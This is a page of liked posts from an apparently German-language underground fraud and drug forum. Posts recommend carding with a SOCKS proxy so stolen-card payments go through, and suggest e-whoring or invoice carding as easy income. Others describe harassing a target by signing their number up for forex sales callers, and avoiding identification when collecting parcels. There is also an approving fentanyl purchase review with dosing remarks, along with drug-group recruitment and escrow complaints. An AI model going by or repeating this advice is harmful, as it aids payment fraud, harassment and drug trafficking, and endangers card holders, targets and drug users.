    1 like
  19. Ja. Kann man so machen! Auch zum carden ist es wichtig einen Socks vorzuschalten, damit z.B. Zahlungen mit CC besser durchgehen. LG Bulli
    1 like
  20. Wow. Ukash.. Wie lange habe ich den Namen nicht mehr gehört! Bekomme gerade heftigste Scene-Backflashs.😁 Und zu Liberty. War Klasse. Bis sie dichtgemacht haben/wurden! LG Bulli
    1 like
  21. Kann es sein das hier schon seit längerem keine ths mehr ausgezahlt wurden ? Wird das Forum sich evtl verabschieden mit den th Geldern? Das wäre ja nicht das erste mal das sowas passiert ? Freitag würde mein TH vom Käufer freigegeben seit dem bettel ich um mein Geld aber außer hinhalten geschieht absolut nichts . Gestern dann die freudige Nachricht : heute werden alle th's ausbezahlt aber ich mache auf und meine Kohle ist immernoch nicht da ? Wie soll man so Geschäfte machen ? Keine Ahnung ob ich über diese Situation weinen oder Lachen soll 😅 Ist das hier normal so ? Läuft das wirklich immer so ab ? Grüße
    1 like
  22. hattest keine 2 minuten um deinen eigenen threadtext zu schreiben?
    1 like
  23. Moin. Solange er nicht wie ein Junkie aussieht, sollten eigentlich alle Banken mitspielen. Geh aber davon aus, dass der Kerl in der Schufa steht! Dann bekommt er bestenfalls ein Guthabenkonto. Aber selbst dafür sind 2gr Pep ein sehr guter Preis. Warten wir mal ab, was unsere Board-Profis dazu sagen. ;-) LG Bulli
    1 like
  24. Was genau willst du mir aber damit sagen ? Legen beide Boards einen Exit hin oder ich verstehe nicht ? Ich feiere ja Treuhand aber man sollte nicht nur Käufer sondern auch Verkäufer respektieren und schützen. Es nervt und da bin ich nicht der einzige hier sind Leute die haben saftige Summen im th liegen und die schieben auch Paranoia , dagegen ist mein Fall im Endeffekt ein Witz . Aber es geht auch nicht um die Summe sondern einfach nur um die Art und Weise
    1 like
  25. @ TwoLate Ich habe es eben in der Shoutbox geschrieben. Auf einem anderen Board warten die user zwischen 3 und 8+ Tagen und auch heute kritisiert es man dort in der Chatbox.
    1 like
  26. Wollte dir auch nichts unterstellen. 😉 Cheffe ist halt immer kurz angebunden. Und ja. Verstehe das man gerne flott sein Geld haben will. Poste doch deinen Verbesserungsvorschlag mal hier: https://cstate.to/forum/57-bugs-verbesserungsvorschläge/ LG Bulli
    1 like
  27. Hab diesen Anbieter nicht ein Jahrzehnt vertraut! Hatte ihn vor 10 Jahren genutzt. Da war er sehr beliebt. Dachte dann das ich ihn wieder use, und wurde schwer enttäuscht. Habe nun einige neue Anbieter und bin zufrieden.😉 LG Bulli
    1 like
  28. https://www.zotteljedi.de/socket-buch/socket-buch.pdf
    1 like
  29. Versucht mal ein anderen Anbieter zu vertrauen wenn man über ein Jahrzehnt einem vpn treu gewesen ist. Mfg, Toni45
    1 like
  30. definitiv wäre E-Whoring eine einfache Möglichkeit wenn du dir den Stress mit dem schreiben geben willst, ich hätte da keine Lust drauf zu viele Kopfschmerzen. Alternative wäre das unkomplizierteste Rechnungscarding, kein Startkapital nötig und einfach zu handhaben. Währenddessen immer mal in die Tutorial von 2010 reinschauen ist zwar alles veraltet aber soo lernt man die Grundlagen und kann sich "weiterbilden" ich würde dir nicht empfehlen ein TUT zu kaufen
    1 like
  31. Herzlich willkommen bei uns!! LG Bulli
    1 like
  32. Perfect Money war keine online wallet sonder eine anonym e-wallet wie WebMoney es gib ja noch payeer / WebMoney jedoch kaum bzw 0 anonym wie PM Ja ware mega nice wann back komme
    1 like
  33. https://www.iforex.nl/l Ist auf niederländisch weil ich NL VPN drinne habe, gibt auch nicht mehr viel von der Werbung, zumindest nicht so viel wie noch vor ein paar Monaten. Kannst dort aber DE Nummern eintragen also werden da auch Caller für DE anrfuen, und selbst wenn nicht Hauptsache die gehen dem Target auf die Eier.
    1 like
  34. Carding eventuell. Je nachdem wie du auch Erfahrung hast
    1 like
  35. 1 like
  36. cstate-network ist auf jeden Fall Scam, der Link zum Nachbarforum war echt aber cstate-network ist 100% Phishing. Edit: Achso du meinst das Nachbarboard mit zwei Bindestrichen, ist auch Phishing die haben nur einen Bindestrich.
    1 like
  37. @ Libratello Bitte nimm den link zu dem anderen Forum aus deinem Beitrag raus.
    1 like
  38. Scheint mir Scam zu sein, der richtige Krypton heißt @kryptoncs bei Telegram. Sollte ich mich irren bitte ich @ Krypton um Korrektur.
    1 like
  39. 1 like
  40. Das klingt doch zu schön um 2025 noch möglich zu sein? Ohne Personalausweis anonym Pakete bestellen und abholen gehen nur mit einem Passwort? Kann mir keiner erzählen dass in Zeiten von maximal gewollter Kontrolle sowas noch machbar sein soll. Da gibt es mit Sicherheit sogar schon ein Gesetz oder irgendeine Vorschrift gegen. 1990 ging das vielleicht mal
    1 like
  41. Servus, ist jemand gut vernetzt in TG Drogengruppen? und hat Interesse cash zu mache? 4Blocks
    1 like
  42. Platzhalter für feedback Sollte Montag den 17.nov rausgegangen sein. Feedback zum Fentanyl, Kontaktaufnahme war anfangs schwierig wegen den online Zeiten hat sich dann aber alles schnell abwickeln lassen. Die Ware ist wirklich von sehr sehr guter Qualität und man braucht wirklich nicht viel um eine Wirkung zu erzielen. Ein Kollege bekommt substi 600mg und das fenta ist bei ihm übers Morphium drüber gefahren wie nichts. Er hatte schon lange nicht mehr so einen schönen Tag, nur müsst ihr bedenken das es so sein wird das dann die substi nicht mehr greift wenn ihr Fentanyl zu lange konsumiert und habt dann sehr unangenehme Entzugserscheinungen. Bitte um Vorsicht im Umgang damit und unerfahrene vorallem ohne Toleranz sollten mit etwas schwächeren beginnen anstatt von Fentanyl. Versand war heftig schnell,selten erlebt. Kaufempfehlung geht jedenfalls raus.
    1 like
  43. dafür haben fast alle Post Filialen Kameras
    1 like
  44. aber keine empfangsbestätigung bei postlagernd,, paketshop vlt besser, je nach land, anbieter, shop... kann eine bestellung auch ankündigen dass man empfangsbestätigung bekommt... muss aber gucken welchen versanddienst (empfangsdienst) ein paketshop akzeptiert . am besten direkt fragen bevor als versandziel angibt, ebenso ob überhaupt geöffnet ist der paketshop um eine bestellung annehmen zu können :)
    1 like
This leaderboard is set to Berlin/GMT+02:00
×
×
  • Create New...